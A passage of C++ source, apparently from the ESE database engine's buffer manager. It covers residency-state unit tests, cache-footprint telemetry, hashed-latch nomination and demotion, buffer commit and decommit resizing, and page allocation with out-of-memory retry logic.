CHECK( g_cbfCacheResident == cbfCacheResidentInit );
}
JETUNITTEST( BF, BfrsBFISwitchBFResidencyFlagForced )
{
BF bf;
const DWORD cbfCommittedInit = 50;
const DWORD cbfNewlyCommittedInit = 10;
const LONG cbfCacheResidentInit = 20;
bf.bfrs = bfrsNotCommitted;
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( &bf, bfrsNewlyCommitted );
CHECK( bfrsOld == bfrsNotCommitted );
CHECK( bf.bfrs == bfrsNewlyCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit + 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit + 1 );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
}
JETUNITTEST( BF, BfrsBFISwitchBFResidencyFlagConditional )
{
BF bf;
const DWORD cbfCommittedInit = 50;
const DWORD cbfNewlyCommittedInit = 10;
const LONG cbfCacheResidentInit = 20;
// no switch expected.
bf.bfrs = bfrsNewlyCommitted;
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
const BFResidenceState bfrsOldUnchanged = BfrsBFIUpdateResidentState( &bf, bfrsNotCommitted, bfrsResident );
CHECK( bfrsOldUnchanged == bfrsNewlyCommitted );
CHECK( bf.bfrs == bfrsNewlyCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// switch expected.
bf.bfrs = bfrsResident;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
const BFResidenceState bfrsOldChanged = BfrsBFIUpdateResidentState( &bf, bfrsNotCommitted, bfrsResident );
CHECK( bfrsOldChanged == bfrsResident );
CHECK( bf.bfrs == bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit - 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit - 1 );
}
#endif // ENABLE_JET_UNIT_TEST
// Cache telemetry
POSTIMERTASK g_posttBFIMaintTelemetryITask = NULL;
void BFIMaintTelemetryRequest()
{
// if the trace isn't enabled then do not generate telemetry
if ( !( FOSEventTraceEnabled< _etguidCacheMemoryUsage >() ||
(BOOL)UlConfigOverrideInjection( 56322, fFalse ) ) )
{
return;
}
// generate telemetry one time period from now
(VOID)ErrBFIMaintScheduleTask(
g_posttBFIMaintTelemetryITask,
NULL,
dtickTelemetryPeriod,
0);
}
void BFIMaintTelemetryITask( VOID *, VOID * pvContext )
{
// compute the cache footprint by ifmp, tce
LONGLONG** rgrgcbCacheByIfmpTce = new LONGLONG*[ g_ifmpMax ];
TICK** rgrgtickMinByIfmpTce = new TICK*[ g_ifmpMax ];
for ( IFMP ifmpT = 0; ifmpT < g_ifmpMax; ifmpT++ )
{
rgrgcbCacheByIfmpTce[ ifmpT ] = NULL;
rgrgtickMinByIfmpTce[ ifmpT ] = NULL;
}
const TICK tickNow = TickOSTimeCurrent();
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
        // only inspect pages we can immediately share-latch to ensure data quality
if ( pbf->sxwl.ErrTryAcquireSharedLatch() != CSXWLatch::ERR::errSuccess )
{
continue;
}
IFMP ifmp = pbf->ifmp;
// only inspect cached pages that are fully resident
if ( ifmp == ifmpNil || pbf->pgno == pgnoNull || pbf->bfrs != bfrsResident )
{
pbf->sxwl.ReleaseSharedLatch();
continue;
}
// defer allocate our storage
if ( rgrgcbCacheByIfmpTce[ ifmp ] == NULL )
{
rgrgcbCacheByIfmpTce[ ifmp ] = new LONGLONG[ tceMax ];
rgrgtickMinByIfmpTce[ ifmp ] = new TICK[ tceMax ];
for ( int tceT = 0; tceT < tceMax; tceT++ )
{
rgrgcbCacheByIfmpTce[ ifmp ][ tceT ] = 0;
rgrgtickMinByIfmpTce[ ifmp ][ tceT ] = tickNow;
}
}
// track the space consumed by ifmp and tce
rgrgcbCacheByIfmpTce[ ifmp ][ pbf->tce ] += g_rgcbPageSize[ pbf->icbBuffer ];
// only track the last touch time for buffers cached for normal use and that aren't held over for any other
// reason (e.g. dirty and cannot be flushed) because we are trying to find the natural reference interval
if ( pbf->lrukic.FSuperColded() == fFalse && pbf->bfdf <= bfdfUntidy )
{
rgrgtickMinByIfmpTce[ ifmp ][ pbf->tce ] = TickMin( rgrgtickMinByIfmpTce[ ifmp ][ pbf->tce ],
pbf->lrukic.TickLastTouchTime() );
}
pbf->sxwl.ReleaseSharedLatch();
}
// emit telemetry reflecting this cache footprint
for ( IFMP ifmp = 0; ifmp < g_ifmpMax; ifmp++ )
{
if ( !rgrgcbCacheByIfmpTce[ ifmp ] )
{
continue;
}
FMP* pfmp = &g_rgfmp[ ifmp ];
pfmp->EnterBFContextAsReader();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp && pbffmp->fCurrentlyAttached )
{
for ( TCE tce = 0; tce < tceMax; tce++ )
{
if ( rgrgcbCacheByIfmpTce[ ifmp ][ tce ] == 0 )
{
continue;
}
ETCacheMemoryUsage(
pfmp->WszDatabaseName(),
tce,
PinstFromIfmp( ifmp )->FRecovering() ? iofileDbRecovery : iofileDbAttached,
ifmp,
rgrgcbCacheByIfmpTce[ ifmp ][ tce ],
TickCmp( tickNow, rgrgtickMinByIfmpTce[ ifmp ][ tce ] ) >= 0 ?
DtickDelta( rgrgtickMinByIfmpTce[ ifmp ][ tce ], tickNow ) :
0 );
}
}
pfmp->LeaveBFContextAsReader();
}
// release our resources
for ( IFMP ifmpT = 0; ifmpT < g_ifmpMax; ifmpT++ )
{
delete[] rgrgcbCacheByIfmpTce[ ifmpT ];
delete[] rgrgtickMinByIfmpTce[ ifmpT ];
}
delete[] rgrgcbCacheByIfmpTce;
delete[] rgrgtickMinByIfmpTce;
// schedule our next telemetry
BFIMaintTelemetryRequest();
}
// Internal Functions
// Hashed Latch
#ifdef DEBUG
INLINE BOOL FBFILatchValidContext( const DWORD_PTR dwContext )
{
// if the least significant bit is set in the latch context then it
// contains a pointer to the BFHashedLatch that is latched
if ( dwContext & 1 )
{
BFHashedLatch* const pbfhl = (BFHashedLatch*)( dwContext ^ 1 );
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
PLS* const ppls = Ppls( iProc );
if ( ppls->rgBFHashedLatch <= pbfhl && pbfhl < ppls->rgBFHashedLatch + cBFHashedLatch &&
( DWORD_PTR( pbfhl ) - DWORD_PTR( ppls->rgBFHashedLatch ) ) % sizeof( BFHashedLatch ) == 0 )
{
return fTrue;
}
}
return fFalse;
}
// if the least significant bit is clear in the latch context then it
// contains a pointer to the BF that is latched
else
{
return FBFICacheValidPbf( PBF( dwContext ) );
}
}
#endif // DEBUG
INLINE PBF PbfBFILatchContext( const DWORD_PTR dwContext )
{
// if the least significant bit is set in the latch context then it
// contains a pointer to the BFHashedLatch that is latched
if ( dwContext & 1 )
{
return ((BFHashedLatch*)( dwContext ^ 1 ))->pbf;
}
// if the least significant bit is clear in the latch context then it
// contains a pointer to the BF that is latched
else
{
return PBF( dwContext );
}
}
INLINE CSXWLatch* PsxwlBFILatchContext( const DWORD_PTR dwContext )
{
// if the least significant bit is set in the latch context then it
// contains a pointer to the BFHashedLatch that is latched
if ( dwContext & 1 )
{
return &((BFHashedLatch*)( dwContext ^ 1 ))->sxwl;
}
// if the least significant bit is clear in the latch context then it
// contains a pointer to the BF that is latched
else
{
return &PBF( dwContext )->sxwl;
}
}
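// Illustrative example of the latch-context encoding decoded by the three helpers above
// (a readability sketch, not additional production code):
//
//     DWORD_PTR dwContextBf = (DWORD_PTR)pbf;          // plain BF:     low bit clear
//     DWORD_PTR dwContextHl = (DWORD_PTR)pbfhl | 1;    // hashed latch: low bit set
//
//     PbfBFILatchContext( dwContextBf )   == pbf          PsxwlBFILatchContext( dwContextBf ) == &pbf->sxwl
//     PbfBFILatchContext( dwContextHl )   == pbfhl->pbf   PsxwlBFILatchContext( dwContextHl ) == &pbfhl->sxwl
//
// This works because BF and BFHashedLatch objects are at least 2-byte aligned, leaving the
// least significant pointer bit free to act as a type tag.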
void BFILatchNominate( const PBF pbf )
{
// we should not have the exclusive latch or write latch on this BF
Assert( pbf->sxwl.FNotOwnExclusiveLatch() && pbf->sxwl.FNotOwnWriteLatch() );
Assert( pbf->bfat == bfatFracCommit );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// disable ownership tracking because we abuse the exclusive latch below
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
// the BF has a normal latch, is eligible to be nominated, and can be
// locked for nomination
if ( pbf->bfls == bflsNormal &&
TickCmp( TickOSTimeCurrent(), pbf->tickEligibleForNomination ) > 0 &&
g_bflruk.FSuperHotResource( pbf ) &&
pbf->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
// the BF is locked and still has a normal latch
if ( pbf->bfls == bflsNormal )
{
// try to allocate a nominee slot for this BF (don't use slot 0!)
PLS* const ppls = Ppls();
size_t iNominee;
for ( iNominee = 1; iNominee < cBFNominee; iNominee++ )
{
if ( ppls->rgBFNominee[ iNominee ].pbf == pbfNil )
{
if ( AtomicCompareExchangePointer( (void**)&Ppls( 0 )->rgBFNominee[ iNominee ].pbf,
pbfNil,
pbf ) == pbfNil )
{
break;
}
}
}
// we got a nominee slot
if ( iNominee < cBFNominee )
{
// setup the nominee slot for each processor
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFNominee* const pbfn = &Ppls( iProc )->rgBFNominee[ iNominee ];
pbfn->pbf = pbf;
}
// mark the BF as a nominee
Assert( bflsNominee1 <= iNominee && iNominee <= bflsNominee3 );
pbf->bfls = iNominee;
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s nominated and placed in slot %d", OSFormatPointer( pbf ), (ULONG)iNominee ) );
}
// we did not get a nominee slot
else
{
// prevent any further attempts to nominate this BF until nominee
// slots become available again
pbf->tickEligibleForNomination = TickBFIHashedLatchTime( TickOSTimeCurrent() + dtickMaintHashedLatchesPeriod );
}
}
// unlock the BF
pbf->sxwl.ReleaseExclusiveLatch();
}
// we're done abusing the exclusive latch now
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
// if the BF is a nominee then vote for it to be promoted to a hashed latch
const BFLatchState bfls = BFLatchState( pbf->bfls );
if ( bflsNominee1 <= bfls && bfls <= bflsNominee3 )
{
Ppls()->rgBFNominee[ bfls ].cCacheReq++;
}
#endif // MINIMAL_FUNCTIONALITY
}
BOOL FBFILatchDemote( const PBF pbf )
{
// we should have the exclusive latch or the write latch on this BF
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then try to demote the BF to a normal
// latch
if ( pbf->bfls == bflsHashed )
{
Assert( pbf->bfat == bfatFracCommit );
// remember which hashed latch this BF currently owns
const ULONG iHashedLatch = pbf->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
        // try to acquire the write latch on this hashed latch for all
        // processors
size_t iProc;
for ( iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ].sxwl;
if ( psxwlProc->ErrTryAcquireWriteLatch() == CSXWLatch::ERR::errLatchConflict )
{
break;
}
}
// we got all the latches
if ( iProc == cProcs )
{
// turn off hashed latch mode for this BF
pbf->bfls = bflsNormal;
// make the BF eligible for nomination
pbf->tickEligibleForNomination = TickBFIHashedLatchTime( TickOSTimeCurrent() );
// reset the hashed latch for each processor
for ( size_t iProc3 = 0; iProc3 < cProcs; iProc3++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc3 )->rgBFHashedLatch[ iHashedLatch ];
pbfhl->pbf = pbfNil;
}
}
// release all the latches we acquired
for ( size_t iProc2 = 0; iProc2 < iProc; iProc2++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc2 )->rgBFHashedLatch[ iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
// we succeeded if the BF is no longer in hashed latch mode
return pbf->bfls != bflsHashed;
}
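// Rough lifecycle of the hashed-latch optimization, summarized from the two routines above
// (the promotion step itself is not shown here and is presumably handled by the hashed-latch
// maintenance code elsewhere in this module):
//
//     bflsNormal --BFILatchNominate()--> bflsNominee1..bflsNominee3
//                --(maintenance promotes a sufficiently voted-for nominee)--> bflsHashed
//                --FBFILatchDemote()--> bflsNormal
//
// While a BF is a nominee, each cache request votes for it via the per-processor
// rgBFNominee[].cCacheReq counters; once it is hashed, latching is spread across the
// per-processor BFHashedLatch copies instead of the single BF::sxwl.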
// BF FMP Context
ERR ErrBFISetupBFFMPContext( IFMP ifmp )
{
ERR err = JET_errSuccess;
FMP* pfmp = &g_rgfmp[ifmp];
if ( !pfmp->FBFContext() )
{
pfmp->EnterBFContextAsWriter();
if ( !pfmp->FBFContext() )
{
BYTE* rgbBFFMPContext = (BYTE*)PvOSMemoryHeapAllocAlign( sizeof( BFFMPContext ), cbCacheLine );
if ( !rgbBFFMPContext )
{
pfmp->LeaveBFContextAsWriter();
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
BFFMPContext* pbffmp = new(rgbBFFMPContext)BFFMPContext();
Assert( UlParam( PinstFromIfmp( ifmp ), JET_paramCheckpointTooDeep ) >= lgenCheckpointTooDeepMin );
Assert( UlParam( PinstFromIfmp( ifmp ), JET_paramCheckpointTooDeep ) <= lgenCheckpointTooDeepMax );
LGPOS lgposFileSize = { 0, 0, 1 };
BFOB0::ERR errOB0 = pbffmp->bfob0.ErrInit(
BFIOB0Offset( ifmp, &lgposFileSize ) * 2 * (LONG)UlParam( PinstFromIfmp( ifmp ), JET_paramCheckpointTooDeep ),
cbCheckpointTooDeepUncertainty,
g_dblBFSpeedSizeTradeoff );
if ( errOB0 != BFOB0::ERR::errSuccess )
{
Assert( errOB0 == BFOB0::ERR::errOutOfMemory );
pbffmp->BFFMPContext::~BFFMPContext();
OSMemoryHeapFreeAlign( pbffmp );
pfmp->LeaveBFContextAsWriter();
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
DWORD_PTR rgp[2] = { ifmp, (DWORD_PTR)pbffmp };
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfCreateContext | sysosrtlContextFmp, pfmp, rgp, sizeof( rgp ) );
pbffmp->fCurrentlyAttached = fTrue;
pfmp->SetDwBFContext( DWORD_PTR( pbffmp ) );
}
pfmp->LeaveBFContextAsWriter();
}
HandleError:
return err;
}
// Page Manipulation
ERR ErrBFISetBufferSize( __inout PBF pbf, __in const ICBPage icbNewSize, __in const BOOL fWait )
{
ERR err = JET_errSuccess;
Enforce( icbPageInvalid != icbNewSize );
Assert( pbf->sxwl.FOwnWriteLatch() );
if ( BoolParam( JET_paramEnableViewCache ) )
{
Assert( pbf->icbBuffer == icbNewSize );
}
const size_t cbBufferOld = g_rgcbPageSize[pbf->icbBuffer];
const size_t cbBufferNew = g_rgcbPageSize[icbNewSize];
if ( cbBufferNew < cbBufferOld )
{
// Shrinking the buffer
// set the buffer to the requested size ...
if ( pbf->bfat == bfatFracCommit )
{
// Note: This will not be able to be checked if we ever move to an inst specific
// param for ViewCache because we could be reclaiming the buffer from another inst
// at this point.
Expected( !BoolParam( JET_paramEnableViewCache ) );
Assert( 0 == ( cbBufferOld % OSMemoryPageCommitGranularity() ) );
Assert( 0 == ( cbBufferNew % OSMemoryPageCommitGranularity() ) );
// we need to reset the portion of the buffer past the existing buffer
Assert( (INT)cbBufferOld - (INT)cbBufferNew > 0 );
Assert( 0 == ( ( (INT)cbBufferOld - (INT)cbBufferNew ) % OSMemoryPageCommitGranularity() ) );
            // originally we planned to only decommit in debug, and simply reset and toss
            // the page on free, but testing shows decommit uses significantly less CPU (both
            // kernel and user mode).
OSMemoryPageDecommit( ((BYTE*)((pbf)->pv))+cbBufferNew, cbBufferOld - cbBufferNew );
OnDebug( const LONG_PTR cbCacheCommittedSizeInitial = (LONG_PTR)) AtomicExchangeAddPointer( (void**)&g_cbCacheCommittedSize, (void*)( -( (LONG_PTR)( cbBufferOld - cbBufferNew ) ) ) );
Assert( cbCacheCommittedSizeInitial >= (LONG_PTR)( cbBufferOld - cbBufferNew ) );
// we only need to update this if the buffer is not available and not quiesced.
// only cached buffers are tracked.
if ( !pbf->fAvailable && !pbf->fQuiesced )
{
Assert( ( cbBufferOld != 0 ) && ( cbBufferNew != 0 ) ); // Fully dehydrated buffers are never considered to be in use.
AtomicDecrement( &g_rgcbfCachePages[pbf->icbBuffer] );
Assert( g_rgcbfCachePages[pbf->icbBuffer] >= 0 );
AtomicIncrement( &g_rgcbfCachePages[icbNewSize] );
Assert( g_rgcbfCachePages[icbNewSize] > 0 );
}
Assert( !pbf->fQuiesced || ( icbNewSize == icbPage0 ) ); // All quiesced buffers must be fully dehydrated.
Expected( ( icbNewSize != icbPage0 ) || pbf->fQuiesced || pbf->fAvailable ); // Fully dehydrated buffers are expected to be either quiesced or in the avail pool.
pbf->icbBuffer = icbNewSize;
}
}
else if ( cbBufferNew > cbBufferOld )
{
// Growing the buffer
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
if ( fWait )
{
const LONG cRFSCountdownOld = RFSThreadDisable( 10 );
while( !FOSMemoryPageCommit( ((BYTE*)((pbf)->pv))+cbBufferOld, cbBufferNew - cbBufferOld ) )
{
// ugh! do it again, we've got no choice ...
}
RFSThreadReEnable( cRFSCountdownOld );
}
else if ( !FOSMemoryPageCommit( ((BYTE*)((pbf)->pv))+cbBufferOld, cbBufferNew - cbBufferOld ) )
{
Error( ErrERRCheck( JET_errOutOfMemory ) );
}
FOSSetCleanupState( fCleanUpStateSaved );
OnDebug( const LONG_PTR cbCacheCommittedSizeInitial = (LONG_PTR)) AtomicExchangeAddPointer( (void**)&g_cbCacheCommittedSize, (void*)( cbBufferNew - cbBufferOld ) );
Assert( cbCacheCommittedSizeInitial >= 0 );
// we only need to update this if the buffer is not available and not quiesced.
// only cached buffers are tracked.
if ( !pbf->fAvailable && !pbf->fQuiesced )
{
Assert( ( cbBufferOld != 0 ) && ( cbBufferNew != 0 ) ); // Fully dehydrated buffers are never considered to be in use.
AtomicDecrement( &g_rgcbfCachePages[pbf->icbBuffer] );
Assert( g_rgcbfCachePages[pbf->icbBuffer] >= 0 );
AtomicIncrement( &g_rgcbfCachePages[icbNewSize] );
Assert( g_rgcbfCachePages[icbNewSize] > 0 );
}
// all buffers growing from 0 are expected to be in the avail pool, after being unquiesced
Expected( ( pbf->icbBuffer != icbPage0 ) || pbf->fAvailable );
pbf->icbBuffer = icbNewSize;
BFIFaultInBuffer( pbf->pv, g_rgcbPageSize[icbNewSize] );
}
else
{
// else ... cache counters are right, buffer size is right ...
FireWall( "UnnecessaryBufferSizeChange" );
}
Assert( pbf->icbBuffer == icbNewSize );
HandleError:
if ( err != JET_errSuccess )
{
Assert( ( err == JET_errOutOfMemory ) && ( cbBufferNew > cbBufferOld ) && !fWait );
}
return err;
}
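// Worked example of the bookkeeping above (illustrative numbers only): dehydrating a cached
// 32 KB buffer down to the ICBPage value for 8 KB with fWait == fFalse decommits the trailing
// 24 KB, subtracts 24 KB from g_cbCacheCommittedSize, and moves the buffer from the 32 KB
// bucket of g_rgcbfCachePages[] to the 8 KB bucket. Growing it back commits (and faults in)
// the trailing 24 KB and reverses both adjustments; note that only the grow direction can
// fail with JET_errOutOfMemory, and only when fWait is fFalse.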
#ifdef DEBUG
void BFIAssertNewlyAllocatedPage( const PBF pbfNew, const BOOL fAvailPoolAdd )
{
Assert( pbfNew );
// The BF lifecycle is complex because we re-use buffers, so it can go
// from: unallocated -> allocated memory[0] -> freed to avail pool[1]
// -> in use / clean -> in use / dirty -> in use / clean
// -> freed to avail pool[2] -> in use / clean -> freed again[3]
// -> quiesced -> deallocated memory.
//
// And for each case when it enters the avail pool or gets pulled out (at [1],
// [2], [3]) to be put in use, we want the page to be as fresh as when it
// was newly allocated at [0]/[1].
//
// This function is for validating a BF's initial state is in a newly allocated
// state. You can assume these are true at ErrBFIAllocPage() ... but to be
// defensive and catch issues early, we'll also check this state on entry into
// the avail pool at [1] and re-entry at [2], and exit at [3].
// Very definition of an allocated page, is NOT available
Assert( !pbfNew->fAvailable );
Assert( FBFIValidPvAllocType( pbfNew ) );
Assert( pbfNew->bfat == bfatFracCommit || ( UlParam( JET_paramEnableViewCache ) && pbfNew->bfat == bfatNone ) );
Assert( UlParam( JET_paramEnableViewCache ) || ( pbfNew->pv != NULL ) );
Assert( pbfNew->ifmp == ifmpNil ); // should not belong to any attached DB.
Assert( pbfNew->err == JET_errSuccess );
Assert( !pbfNew->bfbitfield.FRangeLocked() );
Assert( pbfNew->pWriteSignalComplete == NULL ); // should not be undergoing a write IO
Assert( PvBFIAcquireIOContext( pbfNew ) == NULL ); // should not be undergoing any IO
Assert( pbfNew->prceUndoInfoNext == prceNil ); // verstore info should be reset
Assert( !pbfNew->fNewlyEvicted || fAvailPoolAdd );
Assert( !pbfNew->fCurrentVersion ); // version info should be reset
Assert( !pbfNew->fOlderVersion );
Assert( !pbfNew->bfbitfield.FDependentPurged() );
Assert( pbfNew->pbfTimeDepChainPrev == pbfNil );
Assert( pbfNew->pbfTimeDepChainNext == pbfNil );
Assert( !pbfNew->fAbandoned );
Assert( !pbfNew->fWARLatch ); // latch state should be clean
Assert( pbfNew->bfdf == bfdfClean ); // should be in a clean state (bfdf, lgpos's, etc)
Assert( 0 == CmpLgpos( &(pbfNew->lgposModify), &lgposMin ) );
Assert( 0 == CmpRbspos( pbfNew->rbsposSnapshot, rbsposMin ) );
Assert( 0 == CmpLgpos( &(pbfNew->lgposOldestBegin0), &lgposMax ) );
Assert( !pbfNew->fInOB0OL && pbfNew->ob0ic.FUninitialized() );
Assert( !pbfNew->bfbitfield.FImpedingCheckpoint() ); // tracking flags should be empty
Assert( !pbfNew->fSuspiciouslySlowRead );
}
#else
INLINE void BFIAssertNewlyAllocatedPage( const PBF pbfNew, const BOOL fAvailPoolAdd ) { return; }
#endif
ERR ErrBFIAllocPage( PBF* const ppbf, __in const ICBPage icbBufferSize, const BOOL fWait, const BOOL fMRU )
{
Assert( icbBufferSize > icbPageInvalid );
Assert( icbBufferSize < icbPageMax );
Assert( icbBufferSize <= g_icbCacheMax );
Assert( ppbf );
// try to allocate an available BF until we fail and we are not to wait
// or until we succeed
static_assert( dtickMaintAvailPoolOomRetry >= 16, "Can't be smaller than the default Windows timer resolution." );
ULONG cOutOfMemoryRetriesMax = roundupdiv( g_dtickMaintScavengeTimeout, dtickMaintAvailPoolOomRetry );
cOutOfMemoryRetriesMax = UlFunctionalMax( cOutOfMemoryRetriesMax, 10 );
ULONG cOutOfMemoryRetries = 0;
while ( fTrue )
{
*ppbf = pbfNil;
BFAvail::ERR errAvail;
ERR errAvailPoolRequest = JET_errSuccess;
if ( ( errAvail = g_bfavail.ErrRemove( ppbf, cmsecTest, fMRU ) ) != BFAvail::ERR::errSuccess )
{
Assert( errAvail == BFAvail::ERR::errOutOfObjects );
do
{
BFICacheSizeBoost();
errAvail = g_bfavail.ErrRemove( ppbf, cmsecTest, fMRU );
if ( errAvail == BFAvail::ERR::errSuccess )
{
Assert( *ppbf != pbfNil );
break;
}
Assert( errAvail == BFAvail::ERR::errOutOfObjects );
errAvailPoolRequest = ErrBFIMaintAvailPoolRequest( bfmaprtSync );
// failed trying to produce buffers, forcing it to consume deadlock settings might help
if ( ( errAvailPoolRequest != JET_errSuccess ) && fWait )
{
// compute optimal cache size
g_critCacheSizeSetTarget.Enter();
g_cacheram.UpdateStatistics();
g_cacheram.SetOptimalResourcePoolSize();
g_critCacheSizeSetTarget.Leave();
// perform the actual resizing
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
const ERR errCacheResize = ErrBFICacheGrow();
FOSSetCleanupState( fCleanUpStateSaved );
if ( ( errAvailPoolRequest == JET_errOutOfMemory ) ||
( ( errAvailPoolRequest > JET_errSuccess ) && ( errCacheResize == JET_errOutOfMemory ) ) )
{
cOutOfMemoryRetries++;
if ( FRFSAnyFailureDetected() )
{
cOutOfMemoryRetriesMax = 10;
}
if ( cOutOfMemoryRetries > cOutOfMemoryRetriesMax )
{
errAvailPoolRequest = ErrERRCheck( JET_errOutOfMemory );
}
else
{
UtilSleep( dtickMaintAvailPoolOomRetry );
}
}
else
{
cOutOfMemoryRetries = 0;
}
}
errAvail = g_bfavail.ErrRemove( ppbf, fWait ? dtickFastRetry : cmsecTest, fMRU );
} while ( ( errAvail != BFAvail::ERR::errSuccess ) && ( errAvailPoolRequest >= JET_errSuccess ) && fWait );
}
if ( *ppbf == pbfNil )
{
Assert( errAvail == BFAvail::ERR::errOutOfObjects );
if ( fWait )
{
Assert( errAvailPoolRequest < JET_errSuccess );
if ( !FRFSAnyFailureDetected() )
{
FireWall( "AvailPoolMaintStalled" );
}
return errAvailPoolRequest;
}
else
{
return ErrERRCheck( errBFINoBufferAvailable );
}
}
else
{
Assert( errAvail == BFAvail::ERR::errSuccess );
}
Assert( !(*ppbf)->fInOB0OL && (*ppbf)->ob0ic.FUninitialized() );
// past point of failure for this buffer
(*ppbf)->sxwl.ClaimOwnership( bfltWrite );
Assert( (*ppbf)->sxwl.FOwnWriteLatch() );
Enforce( (*ppbf)->fAvailable );
// asserted in above func, but we want to make extra sure
AssertTrack( !(*ppbf)->bfbitfield.FRangeLocked(), "BFAllocRangeAlreadyLocked" );
Enforce( (*ppbf)->err != errBFIPageFaultPending );
Enforce( (*ppbf)->err != wrnBFPageFlushPending );
Enforce( (*ppbf)->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( *ppbf ) == NULL );
Enforce( (*ppbf)->pbfTimeDepChainNext == NULL );
Enforce( (*ppbf)->pbfTimeDepChainPrev == NULL );
Assert( (*ppbf)->bfdf == bfdfClean );
Assert( (*ppbf)->fOlderVersion == fFalse );
Assert( (*ppbf)->fSuspiciouslySlowRead == fFalse );
if ( (*ppbf)->bfat == bfatNone )
{
Expected( BoolParam( JET_paramEnableViewCache ) );
Assert( (*ppbf)->pv == NULL );
}
else
{
Assert( (*ppbf)->bfat == bfatFracCommit );
Assert( (*ppbf)->pv != NULL );
// Why would this not hold? Because of our shrink to zero - then it is not allocated.
Expected( (*ppbf)->icbBuffer == icbPage0 || FOSMemoryPageAllocated( (*ppbf)->pv, g_rgcbPageSize[(*ppbf)->icbBuffer] ) ); // just check the first page ...
}
// success: requested size already, break to proceed.
if ( (*ppbf)->icbBuffer == icbBufferSize )
{
break;
}
const ERR errSetBufferSize = ErrBFISetBufferSize( *ppbf, icbBufferSize, fFalse );
// success: grew to requested size, break to proceed.
if ( errSetBufferSize >= JET_errSuccess )
{
break;
}
// failed to grow, handle error.
Assert( errSetBufferSize == JET_errOutOfMemory );
Assert( icbBufferSize > (*ppbf)->icbBuffer );
// re-insert the buffer into the avail pool after de-hydrating it to zero to
// increase chances of success next time
Assert( (*ppbf)->sxwl.FOwnWriteLatch() );
if ( (*ppbf)->icbBuffer != icbPage0 )
{
CallS( ErrBFISetBufferSize( *ppbf, icbPage0, fFalse ) );
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( *ppbf, bfrsNotCommitted );
Assert( bfrsOld != bfrsNotCommitted );
}
(*ppbf)->sxwl.ReleaseOwnership( bfltWrite );
Assert( !(*ppbf)->fInOB0OL && (*ppbf)->ob0ic.FUninitialized() );
g_bfavail.Insert( *ppbf, !fMRU );
*ppbf = pbfNil;
// fail out if we've tried too many times
if ( FRFSAnyFailureDetected() )
{
cOutOfMemoryRetriesMax = 10;
}
if ( cOutOfMemoryRetries > cOutOfMemoryRetriesMax )
{
return errSetBufferSize;
}
cOutOfMemoryRetries++;
}
// If we can, increase cache size before scavenger can kick in - allow cache to grow
// faster and prevent needless I/O
if ( ( g_bfavail.Cobject() <= (ULONG_PTR)cbfAvailPoolLow ) &&
( FJetConfigMedMemory() || FJetConfigLowMemory() ) &&
g_cacheram.AvailablePhysicalMemory() >= OSMemoryQuotaTotal() / 10 )
{
BFICacheSizeBoost();
}
// request avail pool maintenance
CallS( ErrBFIMaintAvailPoolRequest( bfmaprtUnspecific ) );
// update DBA statistics
// we track our evictions on page reuse, so we need to cache the buffer size here before it
// gets wiped out
const ICBPage icbBufferEvicted = (ICBPage)(*ppbf)->icbBuffer;
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( *ppbf, bfrsResident );
if ( bfrsOld != bfrsResident )
{
// we will not try to do this if a buffer is smaller than a VM page or
// the page is not marked as not resident
BOOL fTryReclaim = ( (DWORD)g_rgcbPageSize[(*ppbf)->icbBuffer] >= OSMemoryPageCommitGranularity() &&
bfrsOld == bfrsNotResident );
// if we are going to try for a reclaim then reset the page before we
// touch it to avoid causing a hard page fault if the page data has
// been evicted by the OS
if ( fTryReclaim )
{
if ( (*ppbf)->bfat == bfatFracCommit )
{
// Note: This will not be able to be checked if we ever move to an inst specific
// param for ViewCache because we could be reclaiming the buffer from another inst
// at this point.
Expected( !BoolParam( JET_paramEnableViewCache ) );
